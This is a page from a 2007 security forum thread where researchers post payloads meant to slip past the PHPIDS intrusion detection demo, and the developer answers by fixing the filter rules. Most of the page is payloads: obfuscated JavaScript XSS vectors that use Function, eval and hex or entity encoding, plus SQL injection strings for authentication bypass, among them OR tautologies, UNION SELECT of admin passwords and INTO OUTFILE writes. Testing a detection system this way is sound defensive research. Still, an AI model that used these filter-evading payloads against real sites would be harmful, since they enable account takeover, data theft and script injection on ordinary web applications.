Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...345678910111213...LastNext
Current Page: 8 of 31
Re: PHPIDS (0.4 was just released)
Posted by: thornmaker
Date: September 17, 2007 06:17PM

@.mario and christian: No worries... I know you guys appreciate the vectors, and I appreciate the recognition. I think it's good that you're staying focused on overall goals of the project. I just wanted to clarify that if at any point you feel like stopping this endless cycle, that's just fine with me.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 17, 2007 08:30PM

s=function test2() {return 'hrefjavascriptalert(1)a';1,1}();
void(a = {} );
void(c = URL );
a.c=function xyz() {return c[4] }();
a.h1=function xyz() {return s[0] }();
a.h2=function xyz() {return s[1] }();
a.h3=function xyz() {return s[2] }();
a.h4=function xyz() {return s[3] }();
a.u1=function xyz() {return s[4] }();
a.u2=function xyz() {return s[5] }();
a.u3=function xyz() {return s[6] }();
a.u4=function xyz() {return s[7] }();
a.u5=function xyz() {return s[8] }();
a.u6=function xyz() {return s[9] }();
a.u7=function xyz() {return s[10] }();
a.u8=function xyz() {return s[11] }();
a.u9=function xyz() {return s[12] }();
a.u10=function xyz() {return s[13] }();
a.u11=function xyz() {return s[14] }();
a.u12=function xyz() {return s[15] }();
a.u13=function xyz() {return s[16] }();
a.u14=function xyz() {return s[17] }();
a.u15=function xyz() {return s[18] }();
a.u16=function xyz() {return s[19] }();
a.u17=function xyz() {return s[20] }();
a.u18=function xyz() {return s[21] }();
$_=function xyz() {return a.u1 + a.u2 + a.u3 + a.u4 + a.u5 + a.u6 + a.u7 + a.u8 + a.u9 + a.u10 + a.c + a.u11 + a.u12 + a.u13 + a.u14 + a.u15 + a.u16 + a.u17 + a.u18 }();
for(i in x=this) x[a.h1+a.h2+a.h3+a.h4]=$_;

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: thornmaker
Date: September 17, 2007 09:41PM

a lot of new stuff going on in that one gareth... cool!

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: thornmaker
Date: September 17, 2007 11:06PM

...here's my first one using the xml tags... and also the shortest one i've found in a long time.

http://demo.php-ids.org/?test=%61%3D%3C%72%3E%6C%6F%63%61%3C%76%3E%65%3C%2F%76%3E%74%69%6F%6E%2E%68%61%73%3C%76%3E%76%61%3C%2F%76%3E%68%2E%73%75%62%73%3C%76%3E%6C%3C%2F%76%3E%74%72%28%31%29%3C%2F%72%3E%0A%7B%62%3D%30%65%30%5B%61%2E%76%2E%74%65%78%74%28%29%0A%5D%7D%68%74%74%70%3D%27%27%3B%62%28%62%28%68%74%74%70%2B%61%2E%74%65%78%74%28%29%0A%29%29#alert%28%27XML%20w00t%27%29

a=<r>loca<v>e</v>tion.has<v>va</v>h.subs<v>l</v>tr(1)</r>
{b=0e0[a.v.text()
]}http='';b(b(http+a.text()
))

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 18, 2007 12:08AM

Nice execution workaround :) 0e0

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 18, 2007 12:08AM

s=function test2() {return 'aalert(1)a';1,1}();
void(a = {} );
a.a1=function xyz() {return s[1] }();
a.a2=function xyz() {return s[2] }();
a.a3=function xyz() {return s[3] }();
a.a4=function xyz() {return s[4] }();
a.a5=function xyz() {return s[5] }();
a.a6=function xyz() {return s[6] }();
a.a7=function xyz() {return s[7] }();
a.a8=function xyz() {return s[8] }();
$=function xyz() {return a.a1 + a.a2 + a.a3 +a.a4 +a.a5 + a.a6 + a.a7 +a.a8 }();
new Function($)();

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 18, 2007 01:36AM

Got another small and nice one:-
x = localName.toLowerCase() + 'lert(1),' + 0x00;new Function(x)()

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 18, 2007 03:53AM

@all: Thanks a lot again. Will take care for them vectors soon!
@Reiners: I am looking forward for the SQLI contest. I see tons of possible injections there.

Meanwhile eat this:

x='\x61\x6c\x65\x72\x74\x28\x31\x29';
new Function(x)()

based on Gareths vector but a little bit simplified and more obfuscated...



Edited 1 time(s). Last edit at 09/18/2007 05:34AM by .mario.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 18, 2007 03:54AM

Very nice :)

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 18, 2007 05:25AM

Even shorter :)

Function('a\x6cert(1)')();

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 18, 2007 07:05AM

.mario Wrote:
-------------------------------------------------------
> @Reiners: I am looking forward for the SQLI
> contest. I see tons of possible injections there.

Hi!
what do you mean with SQLi contest? Maybe I am not up to date ... :)

And there might be a problem with false positives ...
http://demo.php-ids.org/?test=Just%20in%20case%20this%20idea%20is%20not%20Reiners'%20or%20it%20is%20not%20mine
(bad english, but I'm sure there are some other phrases triggering false positives).
maybe you filter only for "or is not null", because thats the only phrase I know which is working with "or is not".



Edited 2 time(s). Last edit at 09/18/2007 11:26AM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 18, 2007 07:12AM

This unicode attack is cool:-

x=eval,1,1,1;1;
1,1,1,b='\\',1,1,1;
1,1,1,s='\'',1,1,1;
1,1,1,o='0',1,1,1;
x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) );

It didn't work (Score 13) but I thought it might inspire someone

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 18, 2007 01:02PM

@Reiners: Right now there definitely is! I added the string to the false DB database. Will take care of that soon! *fixed*



Edited 1 time(s). Last edit at 09/18/2007 01:54PM by .mario.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 18, 2007 04:53PM

Where is the script tag? now try the hard stuff, including a full script tag. ^^

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 19, 2007 03:10AM

I'm just playing by the rules Ronald, I'll always take the easy option to save time. Although I might take up your challenge :)

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 19, 2007 04:37AM

Yeah would be cool I guess, I'm sure there is some crazy way for that also?

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 19, 2007 04:43AM

In opera :D

<body background=javascript&#58%20%20%20%20%20alert(1)

I haven't got IE to test

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 19, 2007 05:05AM

They've fixed it already :)

damn they're fast.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 19, 2007 07:18AM

woohoo! cool stuff. I really thought they would block most starting html tags?

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Spyware
Date: September 19, 2007 12:35PM

http://demo.php-ids.org/?test=I%20fixed%20the%20window%20(in%20my%20car)%20all%20by%20myself!

should this trigger the protection?

Hm, fixed already?

http://demo.php-ids.org/?test=I%20fixed%20the%20window%20(in%20my%20car)%20all%20by%20myself(again)

Triggers protection too. Once again: should it do this?



Edited 2 time(s). Last edit at 09/19/2007 12:55PM by Spyware.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 19, 2007 07:14PM

&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 20, 2007 05:31AM

s=new String;
e = /aeavaala/+s;
e = new String + e[ 2 ] + e[ 4 ] + e[ 5 ] + e[ 7 ];
a = /aablaecrdt(1)a/+s;
a = new String + a[ 2 ] + a[ 4 ] + a[ 6 ] + a[ 8 ] + a[ 10 ] + a[ 11 ] + a[ 12 ] + a[ 13 ],
e=new Date() [e];
e(a)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 20, 2007 10:26AM

http://demo.php-ids.org/?test=a'%20or%201='1
--> ?test=a' or 1='1

http://demo.php-ids.org/?test=asd'%20union%20(select%20username,password%20from%20admins)%20where%20id='1
--> ?test=asd' union (select username,password from admins) where id='1
edit: on MySQL this can only be used if the mainquery is in brackets () too.
Like "(SELECT ...) UNION (SELECT ...)"
But I guess it works on other DBMS, can somebody confirm that ?

also note, that the following chars can be used between "select[]username,password" on MySQL:
"+", "-", "!", "@", "~" (and of course all whitespaces).
This does not work between "union select", so right now PHP-IDS filters are fine with that ;) Anyways quite interesting for bypassing other filters imho.

false positive ?! ;)
http://demo.php-ids.org/?test=this%20annoys%20mario%20(its%20name%20is%20%22false%20positive%22)%20



Edited 2 time(s). Last edit at 09/20/2007 10:55AM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 20, 2007 02:40PM

Hi!

Phew - those were some head nuts and it took me a while to solve them. The result: Four over-sized rules gone, several ones drastically optimized with conditional regex, many removed false alerts and the whole thing with even smaller rules - 24148 Bytes in the 0.4.0 release and now 23998 in the trunk ;)

Thanks a lot guys!

@Reiners: SQL Injection contest is coming in around '1 OR '2 weeks

Greetings,
.mario

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: tx
Date: September 20, 2007 03:53PM

potential authentication bypass: http://demo.php-ids.org/?test=admin%20'%20having%201%20%231%20%21

I'm not postive that
declare ,@a varchar;
is valid syntax so it may be a moot point (anyone got an answer for that? I can't test at the moment.)
but here's another: http://demo.php-ids.org/?test=%3Bdeclare%20%2C@a%20varchar%3Bbegin%20select%20@a%20%3D%20password%20from%20%27users%27%20limit%201%3B%20%20select%20@a%20as%20a%20into%20tbl_a%3B%20%20end%3B%20%231%20%21

EDIT: this false positive is dedicated to Michael Jordan: http://demo.php-ids.org/?test=I%27m%20watchin%27%20%2323%20from%20the%20bulls%20dunk%20on%20everybody%21

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 09/20/2007 04:04PM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 20, 2007 04:06PM

Nice ones - the
declare ,@
really works? *fixxed*

Thx!
.mario

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: tx
Date: September 20, 2007 04:41PM

Damn your fast! :)

here's another: http://demo.php-ids.org/?test=%27%20or%20id%3D1%20having%201%20%231%20%21

EDIT: and another http://demo.php-ids.org/?test=%27%20or%20username%20REGEXP%20%27admi*%27%20having%201%20%231%20%21

EDIT2: Only works for non multi-byte character sets, but still passes the smoketest: http://demo.php-ids.org/?test=%27%20or%20username%20SOUNDS%20LIKE%20%27adnin%27%20and%201%20sounds%20like%201%20%231%20%21

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 09/21/2007 12:04AM by tx.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 20, 2007 05:50PM

Hi! SQLi contest sounds fun, is there more information available yet?

Again I played with the "or" operator. Here are some examples which all work on MySQL and query with quotes:

//prefix
http://demo.php-ids.org/?test=asd'or-1='-1
--> ?test=asd'or-1='-1
--> ?test=asd'or!1='!1
--> ?test=asd'or!(1)='1
--> ?test=asd'or@1='@1
--> ?test=asd'or-1 XOR'0
...

//functions
http://demo.php-ids.org/?test=asd'%20or%20ascii(1)='49
--> ?test=asd' or ascii(1)='49
--> ?test=asd' or md5(1)^'1
...

//columns
http://demo.php-ids.org/?test=asd'%20or%20table.column^'1
--> ?test=asd' or table.column^'1

//system variables
http://demo.php-ids.org/?test=asd'%20or%20@@version^'0
--> ?test=asd' or @@version^'0
--> ?test=asd' or @@global.hot_cache.key_buffer_size^'1
...

//subquery
http://demo.php-ids.org/?test=asd'%20or!(select%20name%20from%20users%20limit%201)='1
--> ?test=asd' or!(select name from users limit 1)='1
("limit 1" to return only one row, "!(string)" always returns "1")

also works (they all return true somehow):
http://demo.php-ids.org/?test=1'OR!'a
--> ?test=1'OR!'a
--> ?test=1'OR!'0
--> ?test=1'OR-'1
--> ?test=1'OR@'1' IS NULL #1 ! (with unfiltered comment by tx ;)
--> ?test=1'OR!(false) #1 !
--> ?test=1'OR-(true) #a !

//other
http://demo.php-ids.org/?test=1'%20INTO%20OUTFILE%20'C:/webserver/www/readme.php
--> ?test=1' INTO OUTFILE 'C:/webserver/www/readme.php
(useful on blind sql injections in combination with a "or statement" from above)

enough spammed ;) I hope some are useful.
greetings, Reiners



Edited 10 time(s). Last edit at 09/20/2007 08:02PM by Reiners.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 21, 2007 03:24AM

Hi - very cool ones. I am totally swamped in work right now so I will take care of them tomorrow. Thx guys!

<edit>I couldn't wait... all fixx0red :)</edit>



Edited 1 time(s). Last edit at 09/21/2007 11:30AM by .mario.

Options: ReplyQuote
Re: PHPIDS (0.4 was just released)
Posted by: tx
Date: September 21, 2007 02:52PM

@mario: These three four auth bypasses are still getting through:

using id instead of username: http://demo.php-ids.org/?test=%27%20or%20id%3D1%20having%201%20%231%20%21
?test=' or id=1 having 1 #1 !
REGEXP matching admin name: http://demo.php-ids.org/?test=%27%20or%20username%20REGEXP%20%27admi*%27%20having%201%20%231%20%21
?test=' or username REGEXP 'admi*' having 1 #1 !
SOUNDS LIKE : http://demo.php-ids.org/?test=%27%20or%20username%20SOUNDS%20LIKE%20%27adnin%27%20and%201%20sounds%20like%201%20%231%20%21
?test=' or username SOUNDS LIKE 'adnin' and 1 SOUNDS LIKE 1 #1 !

The comment rule (?:"\s*(?:#|--|{))|(?:\/\*!\s?\d+)|(?:ch(?:a)?r\s*\(\s*\d) catches
?test=' #1 !
but can be evaded with
?test=' {some expression or text here} #{some alphanum} !

EDIT:
Another auth bypass using hex: http://demo.php-ids.org/?test=%27%20or%20username%3D0x61646D696E%3B%20%23a%20%21
?test=' or username=0x61646D696E; #a !

I've got some more for you as soon as I'm not under deadline anymore :\

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 09/21/2007 04:09PM by tx.

Options: ReplyQuote
Pages: PreviousFirst...345678910111213...LastNext
Current Page: 8 of 31


Sorry, only registered users may post in this forum.